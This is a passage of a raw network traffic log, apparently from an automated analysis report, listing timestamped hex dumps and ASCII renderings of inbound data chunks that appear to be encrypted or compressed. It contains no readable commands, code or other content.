                                                                                                                                                            2022-09-29 12:45:27 UTC35135INData Raw: ae fb 04 39 30 6b 22 9e e2 a4 13 de 87 0e a2 b2 dd fa c5 ef 90 0f 6f 6a 30 c0 c1 ba 8e 3e 9f 9b 62 40 7d 6a 7c 39 b3 6f 9d e8 d1 d9 00 57 f7 f7 c5 4a 91 d9 8e 5f eb db 24 99 fd e6 c9 f4 0b 22 c4 be f2 c7 88 81 51 f4 66 a0 4b 4b 85 5b ef 61 6a 9c 87 99 bd 00 cf 0e 5e 27 32 4f 56 9f fe 31 d5 2d 55 e0 8e 4a 71 7f aa 8b fe 51 fe 10 df f0 7b 04 26 16 f5 26 7c 40 76 13 fc b2 f8 ab 99 d4 a0 4c d0 d6 56 f7 cb ac 9b 81 c3 98 2b b2 71 95 37 69 1c 61 7f 65 dd f6 60 a3 4a 10 48 e7 f3 81 69 38 30 24 09 8d 79 9b 58 ef 8d 02 44 e2 77 49 23 66 4d 03 3b fc 71 05 37 64 c1 8d b9 b3 96 19 d7 b2 82 ad 59 48 f6 34 54 81 5b d2 73 0f 7b 49 7d f1 0b 83 fe 31 dc f1 aa 56 a1 11 16 e4 09 17 0d 29 ff 9f 72 a3 e6 9c 1c ab a9 22 75 40 05 f6 00 cc 72 77 30 97 ed 4c 62 58 9e 4f 09 6a 6d
                                                                                                                                                            Data Ascii: 90k"oj0>b@}j|9oWJ_$"QfKK[aj^'2OV1-UJqQ{&&|@vLV+q7iae`JHi80$yXDwI#fM;q7dYH4T[s{I}1V)r"u@rw0LbXOjm
                                                                                                                                                            2022-09-29 12:45:27 UTC35151INData Raw: 0d a1 c4 70 2f 1f de 2c 6d 9b 8d 29 f4 ca c3 a4 fe 29 c6 9f 6a 51 76 10 1e ef 42 a8 49 55 ab 02 ba fe f8 54 31 56 9d e1 30 f2 62 14 28 cd 83 3a ca 7a b8 4c 7b ad bb ea 95 16 f7 ba 34 0b 9e 5f 62 af e7 0f a5 74 07 bd 25 a2 ed 2b c2 cb 50 da 72 d6 21 cf 16 d9 19 a8 4e 3d cb 9d d6 62 0c 53 1f 98 7b 23 54 9d 78 91 47 40 ef 4b 13 76 ee 14 45 16 48 29 b4 0e 2e 15 76 3e 01 a1 3e f3 aa 59 8f e2 2d b7 a7 d5 7f d0 20 f6 2e 18 3d e3 d7 4d 51 63 c3 2f e2 29 c0 30 9f 1c e0 2f d4 3b 55 21 2c 3a f6 87 3c 81 1c e2 c1 71 46 76 a8 85 cd 1c a3 b6 e5 0c 33 1a c3 95 1d f2 68 5c 43 ee 21 b3 23 fd b1 36 03 5c 82 4f 60 2b c1 06 7c f2 bc 75 31 58 09 2a c7 3f 7a 0f 3c 38 a9 3a a8 ec 28 54 7f 12 f8 3c 8a f7 bd ab 4b 6a c9 44 ef cb 33 94 f6 a1 b8 87 a7 16 c9 46 1f 7a 48 4a 81 7c 58
                                                                                                                                                            Data Ascii: p/,m))jQvBIUT1V0b(:zL{4_bt%+Pr!N=bS{#TxG@KvEH).v>>Y- .=MQc/)0/;U!,:<qFv3h\C!#6\O`+|u1X*?z<8:(T<KjD3FzHJ|X
                                                                                                                                                            2022-09-29 12:45:27 UTC35167INData Raw: cc da 42 3a 8d dd 13 9b 7f 28 87 85 2a 18 25 c6 22 a2 d8 d6 cc df 7e 04 b3 c7 6e 7a 3a 6a b0 c3 20 2c 62 91 62 27 e6 9d 7f f3 0a 61 d6 08 cd a1 96 fb 0f 2c e4 27 ff e2 4d 0e c0 fe 24 05 a0 8b 18 c2 99 80 8c 89 24 df 8d cc fe 5c f1 08 9b fa 9c bb 08 41 38 d5 63 05 71 be 23 29 96 f4 4f 2e 6a 7e 80 51 3d f1 eb 1d c2 12 cd 35 63 b8 a4 c5 8b 0e 85 5c 24 7f 93 d9 21 ad 53 21 ce 17 2c 01 ea ed c7 e5 f9 b5 63 7b 32 4f e8 3f 63 d8 b4 3b d3 05 54 a3 70 05 8d b3 13 20 1e eb f7 b1 0c 9f 3c 0e bb bb f2 d3 60 5f e8 55 7c d0 23 b1 e3 2e a7 2d f0 f3 ef 02 96 9d 25 72 fb 77 be b1 49 db 0c 20 59 6f af 5a 98 d6 9a 75 05 57 1e 2f ec 78 91 77 ba 7c 75 0c 33 64 e3 03 2f 38 91 ab 2e 4b bb 4a 62 ab 32 87 a0 62 23 16 75 e8 6a 41 68 ae 15 32 b9 0e 5a 2b 10 39 a7 ff 59 45 1e 3b 50
                                                                                                                                                            Data Ascii: B:(*%"~nz:j ,bb'a,'M$$\A8cq#)O.j~Q=5c\$!S!,c{2O?c;Tp <`_U|#.-%rwI YoZuW/xw|u3d/8.KJb2b#ujAh2Z+9YE;P
                                                                                                                                                            2022-09-29 12:45:27 UTC35183INData Raw: f5 8f c1 0c cb e5 f6 87 d0 ab d8 6a ac 8c fa 0a 59 4b 75 7a 65 c3 15 a2 17 d0 79 44 e0 b9 58 2d 67 cc 7e d0 59 46 57 4e de 13 3b eb a3 2a be aa fc ff 42 ac 80 3c d1 91 30 3d 88 85 a2 28 e0 5a a5 b7 de ee 75 be 35 0a 9b c7 3d 44 9f 87 d6 21 4f 21 85 82 8c 5d 55 4a f4 50 da 79 33 4d 7c 1a 57 12 f1 c6 3a e5 21 ba 46 c6 e1 e5 bd d2 b8 c0 0e b8 2f 48 30 0a 0c fb ce 1a 01 66 13 ed 43 29 89 60 0d f3 0a 42 b5 ed bc fb 67 bf 6e ba 55 f9 74 29 03 de 52 97 a4 14 4e a1 78 4c fb 5b 72 cd 18 4f 1c e4 ba 3c 43 23 b3 a5 58 ad 2a a6 4e e0 1f d9 30 56 29 5c 5e 43 76 88 38 9d 47 08 7f 04 44 ea 8e 31 6c 77 b5 3d 66 ff 47 39 c0 32 59 86 f2 c8 06 c9 18 25 64 80 b7 a5 a6 08 5a f9 65 bb 75 af cd eb 6e 75 65 62 99 24 1e 84 57 8d 0c fc cc 5d d7 94 61 ac b7 b3 9b 08 c9 81 2c 7f 2c
                                                                                                                                                            Data Ascii: jYKuzeyDX-g~YFWN;*B<0=(Zu5=D!O!]UJPy3M|W:!F/H0fC)`BgnUt)RNxL[rO<C#X*N0V)\^Cv8GD1lw=fG92Y%dZeunueb$W]a,,
                                                                                                                                                            2022-09-29 12:45:27 UTC35199INData Raw: 58 9b d4 98 c1 4c 0c 3f be c9 64 64 e2 5d 03 dd 07 c4 90 c8 f9 9a ce 1f a6 91 08 40 c1 5d c8 6a 6f e5 96 6a f4 b2 87 13 28 c0 4d 39 f7 db 18 5e f6 75 2c 61 5f 1b a0 dc 9c 1e 07 f6 f2 79 1d f3 a5 de 25 ce c9 c3 4e b2 e6 21 f5 8f 9a b1 6b ef 04 8d 52 f8 5e 28 49 97 f3 d7 47 34 64 8e 94 8a 5b 92 36 3e cf 4d 50 5d 03 42 3a ff 0e 20 09 98 d1 0c fb 36 60 04 32 14 f2 00 19 fc db 55 97 9a ef 46 f2 20 ab a0 9d 71 20 1f 67 bc 54 8a 92 e0 64 9b ac 5a 23 9a 5b 5d 45 0c 6b 88 b7 3a 3a 84 d0 84 50 c3 ca 98 ce 06 e7 0b b8 d2 25 7c 95 72 95 8d 21 0c 19 dd 5f 59 a3 bf 95 51 b6 4c 68 6e 15 36 48 be 56 22 b4 d0 50 82 83 10 c6 ed 24 7b ff 34 a2 35 3e 99 46 a1 6e 01 61 57 a1 ad 65 89 07 8b fe e4 af 5a 7c 31 e8 91 0f 73 96 d4 6e a9 24 36 9b 7f 27 71 a1 36 0d 4b b2 f8 58 3d 95
                                                                                                                                                            Data Ascii: XL?dd]@]joj(M9^u,a_y%N!kR^(IG4d[6>MP]B: 6`2UF q gTdZ#[]Ek::P%|r!_YQLhn6HV"P${45>FnaWeZ|1sn$6'q6KX=
                                                                                                                                                            2022-09-29 12:45:27 UTC35215INData Raw: c8 23 87 18 72 d2 6a c0 41 7a 8d 41 f7 31 0d 58 4b fb 67 b2 5b c9 f3 bb 97 14 0f 05 7f bc a5 79 88 6a 6b 07 8f 07 74 a0 31 b0 24 08 f7 db 54 73 7e 1e 3f 0e 00 dd 48 c4 22 9b cd 8e 95 64 68 b3 c0 37 10 41 2b 0f 4b f6 98 0c aa 78 18 e9 31 76 24 4c cc a0 3c 35 de 8a aa 6d c2 24 2a e9 7e 44 17 cd 59 6c 27 ad e3 65 f5 45 95 34 60 9c 1f f5 05 78 5b a7 de 0e 03 df 24 28 8c 06 13 6a 91 ef 40 8f 81 a4 e0 75 d3 79 bc a1 ff e5 b9 17 57 61 0c d1 fe ac 19 90 02 f5 31 3d 6d c7 b2 c0 a3 32 05 42 3e ef aa 54 02 c5 92 c7 e1 a7 11 49 86 05 a0 a1 db fb 7f 15 d5 59 7d ab 7f 8c 07 61 80 7f 54 89 d9 42 f5 d2 00 28 a2 1f d0 66 32 ee 10 e0 1f 80 f3 90 b6 18 1d 2b 75 e3 17 51 cd 42 60 f6 df 1a f8 80 e4 d3 f4 34 e9 4f dc 43 02 49 fe f7 23 e3 74 ee 2f f8 22 3b 00 00 02 58 23 aa 9c
                                                                                                                                                            Data Ascii: #rjAzA1XKg[yjkt1$Ts~?H"dh7A+Kx1v$L<5m$*~DYl'eE4`x[$(j@uyWa1=m2B>TIY}aTB(f2+uQB`4OCI#t/";X#
                                                                                                                                                            2022-09-29 12:45:27 UTC35231INData Raw: f1 0d 02 c8 9e 5b d2 69 50 ac 0e 05 6c 6e 3a 6c 5d 36 1a a6 24 06 5f b8 a2 a2 8c 0a 79 44 28 68 05 43 d9 72 f9 e4 88 fd 98 3e 01 de c4 04 3d f1 f5 78 78 73 8e a3 f9 de b2 5d 1a 79 be e6 b8 8c 72 50 cf d5 e0 e9 8c af e3 93 86 98 1e d4 06 6d 2a 3c b5 15 1a b2 8b 71 ed a7 96 19 5a 77 95 c0 6e 52 3a 95 03 33 f4 fa 66 b8 df a9 b0 00 e4 9e 82 a8 33 ba a5 71 83 88 23 eb 19 7b 29 51 da 7e 17 f4 ad 8b 06 e1 a6 d2 10 64 4e 96 ec e7 29 56 7c 5b 31 57 a6 aa a2 0f e7 cb 06 8b fd 8f 7e b8 55 03 92 35 bb a5 16 84 4d 11 e8 ba 2f c4 97 39 8d d0 f1 e7 ba b0 bb da fb f1 ec 6b 2e 61 29 62 e6 19 db 7d f8 79 f3 a7 4b db 87 ab 31 54 36 11 2d ff ba 33 1d ad 70 37 c0 d6 1b 22 73 79 67 8d 0f 53 a1 98 75 4d 56 52 93 d9 5d f2 66 40 ab af 34 13 e6 1e 2a 51 5b 7a 6a 80 3a 42 c1 ff 2b
                                                                                                                                                            Data Ascii: [iPln:l]6$_yD(hCr>=xxs]yrPm*<qZwnR:3f3q#{)Q~dN)V|[1W~U5M/9k.a)b}yK1T6-3p7"sygSuMVR]f@4*Q[zj:B+
                                                                                                                                                            2022-09-29 12:45:27 UTC35247INData Raw: 2f 5b 7e d5 15 7d 27 84 03 99 48 4f 40 14 4e 36 88 4f 28 09 c3 d5 12 8a 5e 04 3c 69 90 64 48 1f 49 11 75 f2 9e cd e2 8c 35 6e a6 b4 3b 0b 8b 3e ae ee fb 8f 19 b2 dd 40 b8 8b 86 c4 e0 5e d4 c2 5a c1 85 50 2c 63 2d 7e cd 55 e9 b5 80 d6 9b 9b 5c 7f 97 5a c8 98 73 90 89 8d 21 84 12 62 ed a5 c8 23 07 bb 5d 29 f3 70 39 b0 02 bc 48 18 09 d1 4c d7 dc 02 84 4a 61 01 66 ee 7e 96 c3 ee e7 91 a1 14 f8 65 51 c0 0c 06 76 93 f4 5a ae ef 25 0c f2 3c 83 13 94 e5 c0 f4 1e fe 1d 5c 71 e8 5d 77 1e 61 1d f4 46 f6 f1 5c 3b 57 4d 6e fa 04 5c e1 53 7f 6a 58 64 8e 3f 11 0b 96 3f ad b5 e1 af 5e 58 e5 2f 96 67 78 68 9d 2b 3d 80 4c 1e b8 96 dc 0e 59 ef 63 f4 b1 eb 5d 42 70 39 2d f8 a5 62 7d d5 da 90 59 cd 26 de 3d 37 7b 8e f9 5d a0 68 49 74 3e 59 eb 07 64 de f4 8b 07 2f b9 93 fb 9c
                                                                                                                                                            Data Ascii: /[~}'HO@N6O(^<idHIu5n;>@^ZP,c-~U\Zs!b#])p9HLJaf~eQvZ%<\q]waF\;WMn\SjXd??^X/gxh+=LYc]Bp9-b}Y&=7{]hIt>Yd/
                                                                                                                                                            2022-09-29 12:45:27 UTC35263INData Raw: b1 22 d3 c3 13 ca 0b ca 49 9a bd c8 48 97 01 4f d6 e9 0a 3d c3 92 d2 92 99 c7 94 b7 de f2 6a c7 b2 97 d4 9e 23 a1 5e 97 f3 cd bf 38 05 9a 48 89 81 1f b7 bb 01 42 81 01 74 e9 5e 0e 85 66 e9 7c 1e f4 51 13 6b 65 a9 a2 76 ba 31 4e a3 2a 83 7c 7e 52 1e a9 a5 d4 3e 9a 4e 80 ac 75 81 0f 92 d8 d6 90 a9 e2 b1 53 ca b9 28 28 a1 73 f4 78 33 10 a4 f1 99 d1 8b 91 df 3b 7c 3c f1 95 7d ab 93 54 98 7a 19 79 2a 83 80 14 fd 7d 3a 48 7a 53 a1 db 48 b8 c3 b2 18 06 fd 68 8c eb 3b 94 83 5e 81 9a 5a 1e 51 f4 71 f5 e3 53 38 42 00 a0 7e 9c b5 76 84 15 86 26 83 3c 75 4a 0b cb 79 b7 e1 9f 02 77 28 08 28 64 22 6e 62 a8 16 f6 71 06 a6 45 32 09 06 5b 56 ea f5 a5 b9 27 2f 65 49 c1 9d a7 f9 0b 02 b0 ec 4e a9 ee 22 e8 ce e2 43 3b 64 22 01 87 d6 84 35 76 8e 0e 2b d0 46 6c 83 1c e1 ca e0
                                                                                                                                                            Data Ascii: "IHO=j#^8HBt^f|Qkev1N*|~R>NuS((sx3;|<}Tzy*}:HzSHh;^ZQqS8B~v&<uJyw((d"nbqE2[V'/eIN"C;d"5v+Fl
                                                                                                                                                            2022-09-29 12:45:27 UTC35279INData Raw: 02 08 89 97 24 c8 4b ff f2 fe 40 d7 3f 02 e6 5f c9 99 5d 5e 9b 0c 2b 99 d9 be 62 37 b7 06 37 e7 20 42 27 dc 13 5f 82 6b ba c0 3d cc 91 c5 79 84 47 05 9f 51 04 a9 50 05 75 ef 4b b6 a9 82 24 63 96 09 74 73 26 67 5d cd 2f 82 f2 8b ae 5a 97 32 96 90 e1 df 48 e2 3e 48 5a 80 a9 ea 36 ab 0d d0 4d 51 28 f9 b1 59 c7 b5 df 0e 73 51 21 10 02 5c e3 98 b8 1c 7c 48 ae 13 e3 ef 53 ee b1 c0 25 1e b7 f2 2b d4 25 4e 65 d5 ab bf 1e 0a e5 a5 4a 23 be 1a e8 04 62 fb 59 73 b9 6a 82 59 7e 80 ec da 40 63 cb de d5 b9 d1 4e d4 fe 7d 59 bd 3d a1 99 8b 41 c4 dc bb 89 68 ea 83 37 01 e9 f0 c4 af f7 d2 a2 de 14 d8 c5 69 22 20 ed eb 02 d0 62 0a fe fb 70 96 0b 86 7f 75 d4 b8 3c 3f 29 bc d8 23 36 91 b6 a2 a1 58 75 41 4c d0 19 3e ce 10 6c 67 20 08 80 fa 2a 45 3d 2d cd b1 58 4a d6 d7 d2 39
                                                                                                                                                            Data Ascii: $K@?_]^+b77 B'_k=yGQPuK$cts&g]/Z2H>HZ6MQ(YsQ!\|HS%+%NeJ#bYsjY~@cN}Y=Ah7i" bpu<?)#6XuAL>lg *E=-XJ9
                                                                                                                                                            2022-09-29 12:45:27 UTC35295INData Raw: 3f a1 66 41 ca 9a f0 a7 a2 ba 21 98 0d 6b fe 16 58 34 c6 37 f0 95 02 72 66 7b 25 c7 ac 7b 13 1c 1f 96 47 eb 85 52 f1 f1 4f 68 0c fa cb b4 35 bc 14 91 96 9a 4f 8f 86 0c 34 7b f5 e6 2e 9e f9 73 26 90 09 95 4a bc e6 fd 20 d8 fc fd 61 97 c9 03 6d 4d 5e 39 96 0f 63 ea ba 46 63 01 0b 1b 36 05 0d e8 36 aa 81 41 5a 5f 67 de 01 b0 3e e1 35 bc 8e 47 2c 83 3e 39 68 45 1a 5f 82 61 70 68 d2 36 91 df bf a7 ca ee f5 a9 b7 b9 e9 cc 56 5d 6c 0f e4 e1 d5 15 97 bf c6 d1 29 90 97 c9 77 15 2b 84 aa 52 89 69 89 63 23 76 cd 8d ab c2 b4 7b a7 36 7d 6e 18 d9 62 e7 2e 65 e1 84 4c 7b c7 ed c6 c6 7f fe a8 de f4 e0 49 45 a4 62 23 97 b4 9b d8 ef 38 b5 2e 59 f2 13 93 94 cb 01 12 53 3d 59 c1 32 ec 5c d0 db 4f c8 4f 76 58 c9 60 be 5e 78 cb 1a c6 47 a7 18 9c 67 2a 24 40 73 17 7c 9b 26 f4
                                                                                                                                                            Data Ascii: ?fA!kX47rf{%{GROh5O4{.s&J amM^9cFc66AZ_g>5G,>9hE_aph6V]l)w+Ric#v{6}nb.eL{IEb#8.YS=Y2\OOvX`^xGg*$@s|&
                                                                                                                                                            2022-09-29 12:45:27 UTC35311INData Raw: c1 ca 21 78 79 03 29 91 fa 6d 5f 67 0d 2d 5d 48 cf 0f 11 21 02 d6 dc 58 3e 75 d3 06 de 30 02 cc bb 09 f3 ed 88 9e 50 44 0e c1 53 c4 a7 cb 25 96 eb 23 0a bc 3b 5f b5 81 3b f4 40 38 7c 27 0c b9 e7 c5 5e 9f 7f 0f a2 19 97 f9 79 46 25 21 0d 5e 42 84 f2 5e 93 b8 25 ee a9 36 f9 57 26 9a 59 c8 04 c4 ef 77 21 c2 73 ce 41 d8 33 29 1b ef e0 00 08 12 39 56 05 e7 9e ae 2d 60 ec 94 4f 1b 90 14 1c 6f c1 cb 45 71 3b 84 ac 82 48 3e f0 39 69 bd 31 b8 aa 42 6c 73 d3 d2 4f 3f fb 07 d8 c6 9b fd 4c be 1a 87 ef 77 e2 d4 af 07 b1 fe b9 04 e7 e8 a5 48 18 be a0 0c 3a 52 e9 16 87 0a cf e4 47 0c 23 cc aa 6b 6c 73 66 91 c9 3e 96 48 c6 a3 06 4e 4c 8f e1 77 f7 e1 83 56 af 0e c2 60 4c 23 7f 79 99 d3 a0 f2 17 a0 ff f0 e1 b4 55 93 71 45 21 d3 0d a5 7a 12 4a a4 0c 7d 85 4d 63 89 68 0a f0
                                                                                                                                                            Data Ascii: !xy)m_g-]H!X>u0PDS%#;_;@8|'^yF%!^B^%6W&Yw!sA3)9V-`OoEq;H>9i1BlsO?LwH:RG#klsf>HNLwV`L#yUqE!zJ}Mch
                                                                                                                                                            2022-09-29 12:45:27 UTC35327INData Raw: 81 54 81 b3 6b fa 47 7c 60 57 5c 0e fb 17 e9 fd 67 e9 01 7b d6 61 37 3b 30 2f fa c4 bb 8d d1 af cc 52 61 36 7b 19 e7 32 aa f0 c2 77 17 31 e1 b1 3d 64 5d 69 ad e6 25 26 aa 5d 21 b1 aa 55 bc 1b 0a ad 2e 92 42 43 b9 69 57 ca 59 5c ba 32 38 b2 1c db 51 2d 13 24 05 d6 9e e1 e6 46 83 26 cb f6 65 4b 33 8f e6 09 38 e0 c4 69 d4 89 1d e7 cf f6 00 19 0c 5b ae 5e 44 0b 32 29 94 d4 0c 4a a8 4b 64 53 10 86 78 84 5a c4 71 15 a8 2d b3 82 c8 e9 5b d3 25 b7 23 d8 95 54 6e a4 15 77 bc 99 85 c0 bb 0a e6 76 99 23 81 f3 5c 40 ae 4d bf bf 6c 2b c9 76 f0 0d b1 3d c8 66 8c 83 3d db 4f de e3 c7 4c 99 93 5d 56 2c 40 e8 d8 1a 12 43 c6 63 30 7b b0 0f 93 f5 d1 ab 40 39 cd 3a d9 41 4f 25 45 1e 1c e8 4e 4f ef 99 ae 34 c4 4e fb 75 94 52 2f 89 0e d0 10 a7 ae 22 5f 11 3f 53 43 fc 22 80 73
                                                                                                                                                            Data Ascii: TkG|`W\g{a7;0/Ra6{2w1=d]i%&]!U.BCiWY\28Q-$F&eK38i[^D2)JKdSxZq-[%#Tnwv#\@Ml+v=f=OL]V,@Cc0{@9:AO%ENO4NuR/"_?SC"s
                                                                                                                                                            2022-09-29 12:45:27 UTC35343INData Raw: e9 5d 4b 3e 37 15 57 9e 81 a4 0e 9d 3b 3d 6f 8b 00 5c 82 06 d2 8b 87 35 15 7e 83 bd 32 4d 71 c4 d8 24 46 56 b2 9c dc 9f 5d dc 87 3d 37 b7 ed 04 a4 2a d0 5a b7 67 48 f1 95 85 1f 71 2e 49 59 2d 90 d1 1b 71 89 c7 13 4c 90 d8 96 f0 6f 3f 1a 53 ad a9 5e 86 7b 7c 09 0c b9 57 24 7a 9b ed 6b 72 ec 72 66 48 80 73 a4 13 6a 24 0c 1c 8f 5b cf b4 c3 b8 70 40 93 64 85 8e 61 9b 46 a2 72 c4 b9 8d 47 e7 67 ad b4 9a ef 87 94 13 5b 11 1f 01 7e f1 d9 c0 6c fd 7a 63 d5 d1 c0 69 d6 b4 6c 84 2d bf e2 cf 7c 32 eb d4 28 53 c4 4d 22 a9 2f 92 03 ab 09 6e d7 a4 bc ac 85 ee b8 5b 59 8c 13 95 e7 15 49 88 86 4c 88 15 3a 64 1b 95 8d b4 48 f8 63 ec a6 dd 9b 99 bf 36 44 cd e8 14 a7 5a e2 3e f8 7a ef ea e8 18 01 1c f4 8d cc 10 13 45 3d 7a 14 60 fa e0 15 61 cc ae 18 0a c0 31 8a df c5 1e 5f
                                                                                                                                                            Data Ascii: ]K>7W;=o\5~2Mq$FV]=7*ZgHq.IY-qLo?S^{|W$zkrrfHsj$[p@daFrGg[~lzcil-|2(SM"/n[YIL:dHc6DZ>zE=z`a1_
                                                                                                                                                            2022-09-29 12:45:27 UTC35359INData Raw: 87 d6 c2 73 a7 fb 30 05 9e d0 4c 3a 7c f4 b7 9f ac ca 41 20 7d 6d b3 f0 2f 22 bd 57 34 ee 59 91 31 40 98 31 39 0d 67 b9 66 72 e5 8f 73 bb b1 7a 83 14 65 16 2b 80 69 b1 95 55 01 a6 11 40 ec 61 bd 51 1f 6c fe 02 c7 ac 83 80 d5 77 c2 64 87 18 03 60 86 5a 39 cf b9 b5 a8 ba 87 8f d9 09 ba 9d d2 21 11 8d e6 3f 0f a4 3f c3 d0 fa e0 ed 6b 74 0d 5e af 34 eb 5a e6 e2 5c c4 1d 40 42 01 87 8f 2d 66 5c 39 10 41 87 b5 9d 1b 61 af 0f a4 da 52 d9 35 c7 12 8d a3 64 06 f8 64 e5 b1 f0 03 22 fe 96 eb 6b f2 fd 55 b1 2e f4 1d 08 46 1f f7 ff da be 28 a3 84 ad 98 e7 50 f2 2e 16 01 81 5b 55 36 0c 0a 59 22 f9 cd 9e 9d 03 3c bc 50 74 6a 40 19 c5 a6 d1 ec ba 16 67 e1 c6 34 ad d4 fd 71 71 38 a7 8d ff 59 c2 1e 98 c6 17 24 47 e1 b5 f2 9c b1 5c fb 75 24 cb 20 3d 5b 51 ba ed 17 41 d0 fe
                                                                                                                                                            Data Ascii: s0L:|A }m/"W4Y1@19gfrsze+iU@aQlwd`Z9!??kt^4Z\@B-f\9AaR5dd"kU.F(P.[U6Y"<Ptj@g4qq8Y$G\u$ =[QA
                                                                                                                                                            2022-09-29 12:45:27 UTC35375INData Raw: a9 af 00 cc 54 a4 4f cf ae 7c 3c 9d 82 fa b6 cf 46 15 49 8b e5 f4 92 38 e5 7a 86 65 75 fe e9 2c bc 72 fc a7 6a 62 63 1a f4 a8 7c d0 5e 82 55 5c 77 f3 37 ac 92 96 08 5d 4d 29 16 95 c1 e8 ec c9 e7 28 55 0f 3a 3c 24 fa c2 a7 6d ae a6 f6 15 fc 4f 02 ef cf c3 96 2f 8f c3 54 82 60 04 bc 01 23 b6 13 62 aa 1e 3f b2 d7 86 f7 27 0f 9c ed cd f5 17 5c 61 24 ac 13 d3 aa 81 d7 88 4b 26 58 9e ba cf 15 97 6b af 02 6f b0 ba 5c e4 69 a4 c6 0f 59 b0 0d 3c 1e db bf 09 05 09 41 f6 04 96 b5 54 5c 02 62 40 55 bc 2c 93 39 99 b0 a4 f4 c1 44 7c 3e ee 59 b4 c1 65 ab d2 18 94 14 71 a8 e9 82 73 cd 5f c3 2a 5f 01 5a 70 92 86 7c 74 96 d3 b5 a0 d6 e3 4d 91 63 55 2e 7c 19 5f d8 3b f9 8e fd 42 d0 56 8d 56 59 70 69 ea 35 1f 7b 4b 6e 4f 18 1b c5 20 3e b2 b9 df 66 d6 33 01 33 e0 01 4b dc 45
                                                                                                                                                            Data Ascii: TO|<FI8zeu,rjbc|^U\w7]M)(U:<$mO/T`#b?'\a$K&Xko\iY<AT\b@U,9D|>Yeqs_*_Zp|tMcU.|_;BVVYpi5{KnO >f33KE
                                                                                                                                                            2022-09-29 12:45:27 UTC35391INData Raw: 22 94 c2 25 f9 bc e3 ee 9d df fe cd cc 1a 78 cf fd 0f 5d ce 03 0a 89 5d 85 f6 6e 32 03 7d 36 af 03 e7 4c 4d c4 3f ad e1 fe 2e 97 9a 38 85 90 25 33 88 6a ce 21 9f 43 9c 06 4e ce 81 fc 32 87 dd 06 3a f5 29 be 83 7b 4a e2 b7 ce a5 cd c7 85 0a 41 c3 96 85 c2 32 61 2a 38 1a d5 17 58 74 84 68 96 fd 17 0a 8f 6a 0e d9 06 63 ca 10 66 d9 fa ba dc 3e a5 d7 46 06 03 04 6a 99 c3 ca 08 cb ba 93 d6 82 3f 0a c8 5d 26 be 0d c5 e4 07 a5 6c f1 52 1a 8c 50 d2 58 20 1e d5 31 ba d9 a1 f8 dc 2c 60 fb 33 52 22 31 fb a3 f4 2a 52 d8 93 9f 44 1b 10 ea 71 a3 c6 66 19 4e ac 0d 9f 8b ce d9 f4 cd 22 c3 dd 98 85 86 41 0c 2c fc f6 2e c4 62 bc 57 59 b8 6f c2 f3 f2 dc d5 e5 10 07 ea 74 b1 eb e8 14 ef 47 63 94 9b 8c 46 a9 99 0c 38 25 dd a9 df c7 39 93 c5 da 42 aa 95 6d a0 bd 84 21 d5 9a ce
                                                                                                                                                            Data Ascii: "%x]]n2}6LM?.8%3j!CN2:){JA2a*8Xthjcf>Fj?]&lRPX 1,`3R"1*RDqfN"A,.bWYotGcF8%9Bm!
                                                                                                                                                            2022-09-29 12:45:27 UTC35407INData Raw: 4d ce a4 3b 6b 56 e7 b3 de a9 6c 6d 6f 59 86 2d 8e 5a ca e9 ee 19 d1 bc 07 32 3b a3 a0 d5 4c af c3 3e 49 61 da dc 48 ed 6a 49 76 77 d7 3f 45 87 0e d3 be 10 8f ae ad 4f 71 44 3e a0 46 d0 29 db f3 83 b0 27 57 dc 0e 95 fc e4 37 dd 47 33 28 9e 50 53 aa 19 56 38 a2 69 8b 0e 39 e9 91 3d 0c 15 55 2a 59 cc 42 cf 2d b6 44 89 2c ff b9 61 79 f0 db 84 a4 81 dc 52 dd bf ab f7 98 da de 37 9f 0f 02 40 1b 59 16 f6 e0 57 8f cc 68 ac 82 14 07 de 45 f9 b4 b1 06 e9 0a 07 98 9d 12 7c 68 1a 6c 65 1b 59 23 54 bd 74 93 f1 59 f9 cd a1 35 aa 17 50 83 e8 74 af 21 70 42 03 a9 39 ac 27 69 fb cc d7 95 59 22 f4 9e a4 e0 aa 0b a4 e3 34 16 ba 46 c8 6d 22 0c 49 3a 7f c2 3e 33 c9 3f 38 0b 75 7a c1 ee b8 af 36 bd 73 4b c6 96 30 7e 4d 41 fb fa 11 28 80 35 10 20 f3 5c c7 9d cb 75 7c 89 c1 85
                                                                                                                                                            Data Ascii: M;kVlmoY-Z2;L>IaHjIvw?EOqD>F)'W7G3(PSV8i9=U*YB-D,ayR7@YWhE|hleY#TtY5Pt!pB9'iY"4Fm"I:>3?8uz6sK0~MA(5 \u|
                                                                                                                                                            2022-09-29 12:45:27 UTC35418INData Raw: bf 17 87 d3 1b 62 a9 6b 4f aa d1 e6 42 e4 64 20 20 9e 34 93 a3 a9 47 cb f5 76 b7 31 72 55 31 1a 3f be 37 c4 39 ff 50 e0 ec fe 11 f0 e1 9b f2 dd 93 ef 29 fa 92 41 c7 fb 5e a8 0a 01 f1 88 04 7a d0 5b e6 7c 9d 97 62 64 b8 ca 55 5e a8 af d0 7a 0d ea dc 05 f1 9a 42 82 b6 9b 65 60 2f 27 6a 40 87 7a 73 55 e0 7c a5 4a 49 23 a8 6e 6f ce 17 67 62 75 f8 44 c7 af c5 c0 a0 5c 24 2c 08 f8 c5 35 7b 1a 4f 65 67 5b cb c0 f2 83 99 6b 6e 5b a5 f1 a7 33 26 09 c4 16 72 1c 12 a2 4a 0c a9 86 f5 e9 87 34 32 71 d2 20 fa bd ba 21 cf b3 50 51 ac cd b3 6b 1b 31 f0 6e c0 3a 0a 93 1b 61 92 ef 00 17 fb 93 13 e6 97 70 3f e3 19 0f b7 b1 0f 08 a5 d3 14 97 0e a4 b0 15 fd fe d2 11 4d 31 2a 19 18 09 95 ad 7c c0 79 9e 77 c1 92 a9 1f 5b 36 76 df 42 cc 15 f6 f7 d8 53 f0 af c9 f9 4a b5 dc 11 e4
                                                                                                                                                            Data Ascii: bkOBd 4Gv1rU1?79P)A^z[|bdU^zBe`/'j@zsU|JI#nogbuD\$,5{Oeg[kn[3&rJ42q !PQk1n:ap?M1*|yw[6vBSJ
